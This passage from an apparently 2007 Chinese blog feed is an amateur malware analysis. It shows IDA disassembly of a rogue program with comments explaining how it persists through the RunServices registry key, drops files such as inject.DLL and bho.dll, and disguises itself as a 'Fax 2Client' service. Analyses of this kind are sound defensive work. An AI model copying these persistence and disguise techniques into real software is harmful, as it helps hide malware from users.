.rdata:09167568&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_9153AE0+158 o<br>
</div>
<div forimg="1"><strong>对脚本不是很了解，只能够到此</strong></div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/renlangliu/blog/category/%B2%A1%B6%BE%CB%EA%D4%C2">病毒岁月</a>&nbsp;<a href="http://hi.baidu.com/renlangliu/blog/item/f06bc707807f5bcc7b8947a3.html#comment">查看评论</a>]]></description>
        <pubDate>2007-05-25  14:34</pubDate>
        <category><![CDATA[病毒岁月]]></category>
        <author><![CDATA[renlangliu]]></author>
		<guid>http://hi.baidu.com/renlangliu/blog/item/f06bc707807f5bcc7b8947a3.html</guid>
</item>

<item>
        <title><![CDATA[FP30SVR.exe/mshtmlsed.exe/player.dll/inject.DLL/ser.exe/play.dll/]]></title>
        <link><![CDATA[http://hi.baidu.com/renlangliu/blog/item/ae576c3ef73f743c70cf6c1c.html]]></link>
        <description><![CDATA[
		
		<p><strong>写在前面：又是一个十足的流氓程序，本文分析不是很透彻，好多地方不是很理解，多多指教。</strong></p>
<p>.rdata:00414210 s_SoftwareMic_0 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0<br>
.rdata:00414210&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .data:00418184 o<br>
.rdata:00414246&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414248 s_SystemCurrent db 'SYSTEM\CurrentControlSet\Services\EventLog\Application\',0<br>
.rdata:00414248&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .data:off_418180 o<br>
.data:00418180 off_418180&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dd offset s_SystemCurrent ; DATA XREF: .text:004016DE r<br>
.data:00418180&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; "SYSTEM\\CurrentControlSet\\Services\\Event"...<br>
.data:00418184&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dd offset s_SoftwareMic_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...<br>
.data:00418188&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; dd offset off_414950<br>
.data:0041818C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.data:00418190 s__?avcntservic db <a href="mailto: .?AVCNTService@@ ,0">'.?AVCNTService@@',0</a><br>
</p>
<p><strong><font color="#0000ff">//写注册表实现登陆前启动</font></strong></p>
<p><br>
.rdata:00414514 s_Bho_dll&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'bho.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:004123E2 o<br>
.rdata:0041451C s_Play_dll&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'play.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412402 o<br>
.rdata:00414528 s_Ser_exe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'ser.exe',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412422 o<br>
.rdata:00414530 s_Inject_dll&nbsp;&nbsp;&nbsp;&nbsp; db 'inject.DLL',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412442 o<br>
.rdata:0041453C s_Tmp333_tmp&nbsp;&nbsp;&nbsp;&nbsp; db 'tmp333.tmp',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412462 o<br>
.rdata:00414548 s_Tmp334_tmp&nbsp;&nbsp;&nbsp;&nbsp; db 'tmp334.tmp',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412482 o<br>
.rdata:00414554 s_Tmp335_tmp&nbsp;&nbsp;&nbsp;&nbsp; db 'tmp335.tmp',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:004124A2 o<br>
.rdata:00414560 s_Helpie_dll&nbsp;&nbsp;&nbsp;&nbsp; db 'HelpIE.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:004124C2 o<br>
.rdata:0041456C s_Player_dll&nbsp;&nbsp;&nbsp;&nbsp; db 'player.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:004124E2 o<br>
.rdata:00414578 s_Mshtmlsed_exe db 'mshtmlsed.exe',0&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412502 o<br>
.rdata:00414588 s_Fp30ie_dll&nbsp;&nbsp;&nbsp;&nbsp; db 'FP30IE.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412522 o<br>
.rdata:00414594 s_Fp30py_dll&nbsp;&nbsp;&nbsp;&nbsp; db 'FP30PY.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412542 o<br>
.rdata:004145A0 s_Fp30svr_exe&nbsp;&nbsp;&nbsp; db 'FP30SVR.exe',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: .text:00412562 o<br>
<br>
<strong><font color="#0000ff">//释放病毒文件FP30SVR.exe、FP30PY.dll、FP30IE.dll、mshtmlsed.exe、player.dll、HelpIE.dll、tmp335.tmp、tmp334.tmp、tmp333.tmp、inject.DLL、ser.exe、play.dll、bho.dll</font></strong></p>
<p>.text:00412392&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.text:004123A0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; 7<br>
.text:004123A2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset s_Ms_2fax ; "ms_2fax"<br>
.text:004123A7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx, offset unk_4181BC<br>
.text:004123AC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; sub_4029A0<br>
.text:004123AC<br>
.text:004123B1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset loc_412FA0<br>
.text:004123B6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; _atexit<br>
.text:004123B6<br>
.text:004123BB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx<br>
.text:004123BC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; retn<br>
.text:004123BC<br>
.text:004123BC ; ---------------------------------------------------------------------------<br>
.text:004123BD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.text:004123C0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; 0Bh<br>
.text:004123C2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset s_Fax2client ; "Fax 2Client"<br>
.text:004123C7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx, offset unk_4181D8<br>
.text:004123CC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; sub_4029A0<br>
.text:004123CC<br>
.text:004123D1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset loc_412FD0<br>
.text:004123D6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; _atexit<br>
.text:004123D6<br>
.text:004123DB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx<br>
.text:004123DC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; retn<br>
.text:004123DC<br>
.text:0041259D&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.text:004125A0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; 22h<br>
.text:004125A2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset s_SystemCurre_0 ; "SYSTEM\\CurrentControlSet\\Services\\"<br>
.text:004125A7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx, offset unk_41837C<br>
.text:004125AC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; sub_4029A0<br>
.text:004125AC<br>
.text:004125B1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp; offset loc_4132A0<br>
.text:004125B6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp; _atexit<br>
.text:004125B6<br>
.text:004125BB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pop&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ecx<br>
.text:004125BC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; retn<br>
.text:004125BC<br>
.rdata:004145FC s_SystemCurre_0 db 'SYSTEM\CurrentControlSet\Services\',0<br>
<br>
<strong><font color="#0000ff">//注册服务名称为ms_2fax的服务，显示名称为Fax 2Client</font></strong></p>
<p>.rdata:00414680&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;\&gt;,0<br>
.rdata:00414684 s_Unknown&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'Unknown',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4057D0+15C o<br>
.rdata:00414684&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_405940+4E o<br>
.rdata:0041468C ; char s_WindowsMe[]<br>
.rdata:0041468C s_WindowsMe&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'Windows Me',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0:loc_40362E o<br>
.rdata:0041468C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057D0+B2 o<br>
.rdata:00414697&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414698 ; char s_Windows98[]<br>
.rdata:00414698 s_Windows98&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'Windows 98',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0:loc_403601 o<br>
.rdata:00414698&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057D0:loc_405866 o<br>
.rdata:004146A3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004146A4 ; char s_Windows98Seco[]<br>
.rdata:004146A4 s_Windows98Seco db 'Windows 98 Second Edition',0<br>
.rdata:004146A4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0:loc_4035D4 o<br>
.rdata:004146A4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057D0+87 o<br>
.rdata:004146BE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:004146C0 ; char s_Windows95[]<br>
.rdata:004146C0 s_Windows95&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'Windows 95',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0:loc_4035A7 o<br>
.rdata:004146C0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057D0:loc_405827 o<br>
.rdata:004146CB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:004146CC ; char s_Windows95Osr2[]<br>
.rdata:004146CC s_Windows95Osr2 db 'Windows 95 OSR2',0&nbsp;&nbsp; ; DATA XREF: sub_4034D0:loc_40357A o<br>
.rdata:004146CC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; sub_4057D0+48 o<br>
</p>
<p><font color="#0000ff"><strong>//判断操作系统版本，如果非NT内核，不进行发作</strong></font></p>
<p>.rdata:004146DC s_Vector&lt;t&gt;TooL db 'vector&lt;T&gt; too long',0 ; DATA XREF: .text:00402F5A o<br>
.rdata:004146EF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:004146F0 ; char ProcName[]<br>
.rdata:004146F0 ProcName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'SHGetFolderPathA',0 ; DATA XREF: sub_403190+33 o<br>
.rdata:00414701&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414704 ; char LibFileName[]<br>
.rdata:00414704 LibFileName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db 'shell32.dll',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_403190+F o<br>
.rdata:00414710 asc_414710:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0+28A o<br>
.rdata:00414710&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;"&gt;,0<br>
.rdata:00414714 s_US&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db ' /u /s "',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0+267 o<br>
.rdata:0041471D&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414720 s_S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db ' /s "',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0+25E o<br>
.rdata:00414726&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:00414728 s_SystemRegsvr3 db '\system\regsvr32.exe',0 ; DATA XREF: sub_4034D0+1DB o<br>
.rdata:0041473D&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414740 s_Regsvr32_exe&nbsp;&nbsp; db '\regsvr32.exe',0&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4034D0+17E o<br>
.rdata:0041474E&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414750 s_2810bb9d466d&nbsp;&nbsp; db '2810BB9D466D}',0&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_403940+78 o<br>
.rdata:0041475E&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 10h<br>
.rdata:00414760 s_01de82f0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '{01DE82F0',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_403940+68 o<br>
.rdata:0041476A&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
.rdata:0041476C s_Y:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+CA o<br>
.rdata:0041476C&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;y&gt;,0<br>
.rdata:00414770 s_S_0:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+60 o<br>
.rdata:00414770&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; unicode 0, &lt;s&gt;,0<br>
.rdata:00414774 s_1_rm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; db '1.rm',0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ; DATA XREF: sub_4040A0+730 o<br>
.rdata:00414779&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; align 4<br>
